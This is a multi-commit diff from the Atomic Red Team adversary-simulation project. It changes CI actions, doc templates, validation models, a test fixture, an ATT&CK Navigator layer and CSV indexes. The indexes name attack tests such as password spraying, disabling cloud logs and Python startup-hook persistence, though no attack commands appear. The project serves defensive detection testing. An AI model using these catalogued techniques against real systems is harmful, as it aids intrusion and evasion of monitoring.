fix attack navigator version

Generated docs from job=generate-docs branch=master [ci skip]
Fix T1003.006 Test #2 prereq_command: incorrect ExportedCommands key (#3297 )
2026-03-23 22:15:22 -04:00 · 2026-03-24 01:58:10 +00:00 · 2026-03-23 21:57:11 -04:00 · 2026-03-24 01:50:28 +00:00 · 2026-03-23 21:49:16 -04:00 · 2026-03-18 05:07:16 +00:00
388 changed files with 22342 additions and 38979 deletions
@@ -69,7 +69,7 @@ jobs:
        env:
          PYTHONPATH: ${{ github.workspace }}

-      - uses: actions/upload-artifact@v5
+      - uses: actions/upload-artifact@v7
        with:
          name: labels.json
          path: atomic_red_team/pr/
@@ -12,7 +12,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
-      - uses: hashicorp/setup-terraform@v3
+      - uses: hashicorp/setup-terraform@v4

      - name: Terraform fmt
        id: fmt
@@ -29,7 +29,7 @@ If you see anything that you believe breaks our community guidelines, no matter

 Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members.  The Atomic Red Team Community Manager and maintainers will review and investigate all complaints. 

-Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
+Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://atomicredteam.io/slack)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.

 Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.

@@ -45,7 +45,7 @@ This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family

 * [Atomic Red Team Website](https://atomicredteam.io/)

-* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
+* [Atomic Red Team Slack](https://atomicredteam.io/slack)

 * [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)

@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1750-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1773-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -32,7 +32,7 @@ To stay up to date on all things Atomic Red Team, sign up for the Atomic Newslet
 Atomic Red Team is open source and community developed. If you're interested in
 becoming a contributor, check out these resources:

- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
+- Join our [Slack workspace](https://atomicredteam.io/slack) and get involved
  with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
  before you join.
 - Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
@@ -1,24 +1,20 @@
-# <%= technique['identifier'] %> - <%= technique['name'] -%>
+# <%= technique['identifier'] %> - <%= technique['name'] %>

-## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
-<blockquote>
-
-<%= technique['description'].gsub("%\\<", "%<") %>
-
-</blockquote>
+## Description from ATT&CK
+<% attack_description_lines = technique['description'].gsub("%\\<", "%<").gsub(/<code>.*?<\/code>/) { |match| match.gsub('~', '\~') } %>
+<% attack_description_lines.lines.each do |desc_line| %>> <%= desc_line.strip %>
+<% end %>
+[Source](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)

 ## Atomic Tests
+
 <% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
-<% title = "Atomic Test ##{test_number+1} - #{test['name']}" %>
- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
+<% title = "Atomic Test ##{test_number+1}: #{test['name']}" %>- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
 <% end %>
-
 <% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
-<br/>
-
-## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
-<%= test['description'].strip -%>
+### Atomic Test #<%= test_number+1 %>: <%= test['name'] %>

+<%= test['description'].strip %>

 **Supported Platforms:** <%= test['supported_platforms'].collect do |p|
  case p
@@ -29,16 +25,13 @@
  end
 end.join(', ') %>

-
-**auto_generated_guid:** <%= test['auto_generated_guid'] %>
-
-
+**auto_generated_guid:** `<%= test['auto_generated_guid'] %>`
 <%def cleanup(input)
    input.to_s.strip.gsub(/\\/,"&#92;")
-end%>
-
+end -%>
 <% if test['input_arguments'].to_a.count > 0 %>
-#### Inputs:
+#### Inputs
+
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 <% test['input_arguments'].each do |arg_name, arg_options| -%>
@@ -47,13 +40,11 @@ end%>
 <% end -%>

 <%- if test['executor']['name'] == 'manual' -%>
-#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
+#### Attack Commands: Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>

 <%= test['executor']['steps'] %>
 <%- else -%>
-
-#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
-
+#### Attack Commands: Run with `<%= test['executor']['name'] %>`!<%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin)<%- end -%>
 <%def get_language(executor)
  language = executor
  if executor == "command_prompt"
@@ -70,30 +61,31 @@ end%>
 <%- end -%>

 <%- if test['executor']['cleanup_command'] != nil -%>
-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```<%= get_language(test['executor']['name']) %>
 <%= test['executor']['cleanup_command'].to_s.strip %>
 ```
-<%- end -%>
+<% end -%>
+<% if test['dependencies'].to_a.count > 0 -%>
+<% dependency_executor = test['executor']['name'] -%>

-<% if test['dependencies'].to_a.count > 0 %>
-<% dependency_executor = test['executor']['name'] %>
-#### Dependencies:  Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
+#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
 <% test['dependencies'].each do | dep | -%>
+
 ##### Description: <%= dep['description'].strip  %>
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```<%= get_language(dependency_executor) %>
 <%= dep['prereq_command'].strip %>
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```<%= get_language(dependency_executor) %>
 <%= dep['get_prereq_command'].strip  %>
 ```
+<% end %>
 <% end -%>
-<% end -%>
-
-
-
-
-<br/>
 <%- end -%>
@@ -121,7 +121,13 @@ Argument = Annotated[
 ]


-class Executor(BaseModel):
+class StrictModel(BaseModel):
+    model_config = ConfigDict(
+        validate_default=True, extra="forbid", validate_assignment=True
+    )
+
+
+class Executor(StrictModel):
    name: ExecutorType
    elevation_required: bool = False

@@ -137,17 +143,13 @@ class CommandExecutor(Executor):
    cleanup_command: Optional[str] = None


-class Dependency(BaseModel):
+class Dependency(StrictModel):
    description: constr(min_length=1)
    prereq_command: constr(min_length=1)
    get_prereq_command: Optional[str]


-class Atomic(BaseModel):
-    model_config = ConfigDict(
-        validate_default=True, extra="forbid", validate_assignment=True
-    )
-
+class Atomic(StrictModel):
    test_number: Optional[str] = None
    name: constr(min_length=1)
    description: constr(min_length=1)
@@ -235,7 +237,7 @@ class Atomic(BaseModel):
        return v


-class Technique(BaseModel):
+class Technique(StrictModel):
    attack_technique: AttackTechniqueID
    display_name: str = Field(..., min_length=5)
    atomic_tests: List[Atomic] = Field(min_length=1)
@@ -0,0 +1,14 @@
+attack_technique: W1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  random_field: abc123
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      echo "ART"
+    name: command_prompt
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
@@ -8,6 +8,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Logs Disabled,4608bc1b-e682-466b-a7d7-dbd76760db31,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
 defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
@@ -38,6 +38,7 @@ defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS dev
 defense-evasion,T1564.008,Hide Artifacts: Email Hiding Rules,1,New-Inbox Rule to Hide E-mail in M365,30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9,powershell
 defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
 defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
+defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,3,Password-Protected ZIP Payload Extraction and Execution,c2ca068a-eb1e-498f-9f93-3d554c455916,bash
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
@@ -555,6 +556,7 @@ defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in Po
 defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
 defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
 defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,11,Obfuscated PowerShell Command via Character Array,6683baf0-6e77-4f58-b114-814184ea8150,powershell
 defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
 defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
 defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
@@ -603,6 +605,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Logs Disabled,4608bc1b-e682-466b-a7d7-dbd76760db31,sh
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
@@ -927,6 +930,11 @@ privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquo
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
@@ -1165,10 +1173,9 @@ persistence,T1556.002,Modify Authentication Process: Password Filter DLL,2,Insta
 persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
 persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
 persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
-persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
-persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
-persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
-persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
+persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -1404,6 +1411,11 @@ persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
@@ -1559,6 +1571,7 @@ collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freeb
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
+collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
